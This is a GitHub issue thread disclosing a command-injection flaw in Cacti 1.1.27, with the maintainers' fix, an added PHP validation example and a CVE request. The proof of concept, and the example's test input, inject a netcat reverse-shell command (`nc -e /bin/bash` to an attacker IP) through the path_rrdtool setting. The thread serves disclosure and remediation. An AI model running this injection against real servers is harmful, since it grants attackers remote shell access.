Critical vuln in cacti 1.1.27 #1057

Closed
cibvetr2 opened this issue Nov 1, 2017 · 7 comments
Comments

@cibvetr2

cibvetr2 commented Nov 1, 2017

We (worlak2 and cibvetr2) found RCE vuln with black-box fuzzing.
PoC
1) Send in POST parameter path_rrdtool -> `nc -e /bin/bash 192.168.1.214 1337 #`
2) After 2-5 minutes we have a backconnect shell
It's triggered after poller.php executes in the process. We think that's because $command is not filtered in ./lib/rrd.php:39-40

With regards worlak2 and cibvetr2

@cigamit
Member

cigamit commented Nov 4, 2017

We will address this using two techniques. The first will be to conduct validation on the two form types: dirpath, and filepath. If, for these two form types, either the directory does not exist, or the file does not exist, the save will be rejected.

Then, as you mentioned, in the case where for some reason a Cacti admin has intentionally added a back door, or some SQL injection has allowed this modification, we will pre-check the path as you described.
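
As an added illustration of the two-stage mitigation described above (example code, not Cacti's own): a validator for the `dirpath` and `filepath` form types that rejects a value unless it is an existing directory or an existing executable file containing no shell metacharacters, and a command builder that re-checks the stored `path_rrdtool` value before it reaches a shell. The function names, and the `$args` parameter, are assumptions.

```php
<?php
// Added example, not Cacti's code: validate a setting of form type
// 'dirpath' or 'filepath' before it is saved, and again before it is
// used to build a shell command in the poller.

function validate_path_setting(string $type, string $value): bool {
    // Reject empty values and anything that could alter a shell command
    // line: whitespace, quotes, separators, redirection, the '#' comment
    // marker used in the report, backslashes.
    if ($value === '' || preg_match('/[\s;&|`$(){}<>"\'#\\\\]/', $value)) {
        return false;
    }
    // realpath() returns false when the path does not exist.
    $real = realpath($value);
    if ($real === false) {
        return false;
    }
    switch ($type) {
        case 'dirpath':
            return is_dir($real);
        case 'filepath':
            // A tool binary must be a regular file the web/poller user can run.
            return is_file($real) && is_executable($real);
        default:
            return false;
    }
}

// Build the poller command only from a value that passes validation at use
// time too, so a value written to the database by some other route (a
// deliberate back door, SQL injection) is still refused. escapeshellarg()
// adds a second layer around every argument.
function build_rrdtool_command(string $path_rrdtool, array $args): ?string {
    if (!validate_path_setting('filepath', $path_rrdtool)) {
        return null; // caller should log this and alert, not run anything
    }
    $cmd = escapeshellarg($path_rrdtool);
    foreach ($args as $a) {
        $cmd .= ' ' . escapeshellarg($a);
    }
    return $cmd;
}

// Constructed input: the injected value from the report must never reach a shell.
$injected = 'nc -e /bin/bash 192.168.1.214 1337 #';
if (build_rrdtool_command($injected, ['--version']) === null) {
    echo "rejected path_rrdtool value\n";
}
```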

cigamit added a commit that referenced this issue Nov 4, 2017
- Potential vulnerability in RRDtool functions
- Adding validation to both dirpath and filepath, also verification of executable status to files in RRDtool function.
- Spurious htmlspecialchars() to html_escape() calls
- Minor SQL formatting for readability
@cigamit
Member

cigamit commented Nov 4, 2017

Resolved, and thanks for reporting! We really appreciate those who comb the Cacti code for potential exploits.

@cigamit cigamit closed this as completed Nov 4, 2017
@cibvetr2
Author

cibvetr2 commented Nov 5, 2017

Thanks for the answer, but we think this needs a CVE assigned.

@ronytomen
Member

Is there an open CVE for this issue? If not, please submit your findings and get us a CVE.

@ronytomen ronytomen reopened this Nov 5, 2017
@worlak2

worlak2 commented Nov 5, 2017

We didn't open a CVE for this issue. We will send one shortly.

@cibvetr2
Author

cibvetr2 commented Nov 7, 2017

Use CVE-2017-16641

@DavidLiedke
Contributor

@ronytomen, it can be closed now.

@cigamit cigamit closed this as completed Nov 11, 2017